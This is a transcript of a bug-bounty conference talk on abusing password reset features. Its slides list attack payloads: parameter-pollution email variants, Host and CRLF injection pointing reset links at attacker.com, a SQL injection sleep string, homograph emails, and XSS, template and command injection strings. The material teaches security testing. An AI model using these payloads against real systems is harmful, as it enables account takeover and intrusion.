Abusing Password Reset Functionality

Transcript

1. Abusing Password Reset Functionality By Tuhin Bose

2. root@kali:~#whoami Bug Bounty Hunter CISO at Damn Secure Pentesting Hub

   Crowdsource Security Researcher at Detectify B. Tech in Cyber Security and Digital Forensics Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX(Top 3) and many other programs

3. Conclusion & QNA What is Password Reset? Common Password Reset

   Implementation in Web Application Hacking Password Reset Feature AGENDA Flows of Password Reset

4. What is Password Reset?

5. If an application has a login feature then there should

   be a password reset feature. In order to implement a proper user management system, developers must implement a password reset feature. It allows the users to reset their accounts' password.

6. Common Password Reset Implementation in Web Applications

7. Common Password Reset Implementation in Web Applications

8. Flows of Password Reset

9. Flow of Password Reset User entered his username/email. Server send

   a password reset link to the user. User open the password reset link and enter the new password. Password changed.

10. Hacking Password Reset Feature

11. Password Reset Poisoning 1.

12. Password Reset Poisoning 1.

13. Password Reset Poisoning 1.

14. 2. HTTP Parameter Pollution (HPP) [email protected]&[email protected] email[][email protected]&email[][email protected] [email protected]%[email protected] [email protected]|[email protected] {"email":"[email protected]","email":"[email protected]"}

    {"email":["[email protected]","[email protected]"]}

15. 2. HTTP Parameter Pollution (HPP)

16. 2. HTTP Parameter Pollution (HPP)

17. 3. Insecure Direct Object Reference

18. 4. Weak Encryption Sometimes developers uses weak encryption algorithms while

    generating password reset tokens. For example, sometimes they just encrypt the user id of user + timestrap using some weak encryption algorithms.

19. 5. Password reset token leakage via referral header

20. 6. Token leakage in response/JS files https://www.company.com/#/changePassword/ username/token

21. 7. Session/Token is not expiring after password reset.

22. 8. Paramminer : Discover hidden parameters (or append previously known

    parameters) in the request. Now try IDOR.

23. 9. Try: POST https://attacker.com/resetpassword.php HTTP/1.1 POST @attacker.com/resetpassword.php HTTP/1.1 POST :@attacker.com/resetpassword.php

    HTTP/1.1 POST /[email protected] HTTP/1.1

24. [email protected]'+(select*from(select(sleep(2)))a)+' 10. SQLi

25. 11. Append a .json after the endpoint.

26. 12. CRLF: /resetpassword?%0d%0aHost:%20attacker.com

27. 13. Application Level DoS

28. 14. If they are sending an otp for password reset,

    try 2fa bypass techniques. https://twitter.com/tuhin1729_/status/141481305505408 6152

29. 15. Try homograph on password reset. [email protected] email=victim@gmаil.com [email protected] Using

    Unicode: Cyrillic Small Letter A

30. 16. Change the request method and content-type and observe how

    the application is responding.

31. 17. Append null bytes after your email and observe the

    response.

32. 18. Try XSS, SSTI, Command Injection etc in the email

    field. hello+(<script>alert(1)</script>)@gmail.com "<%= 7 * 7 %>"@gmail.com hello+(${{7*7}})@gmail.com hello@`whoami`.xyz.burpcollaborator.net

33. 19. Missing Rate Limit

34. More: https://twitter.com/tuhin1729_/status/1437471718 142976007

35. @tuhin1729 [email protected]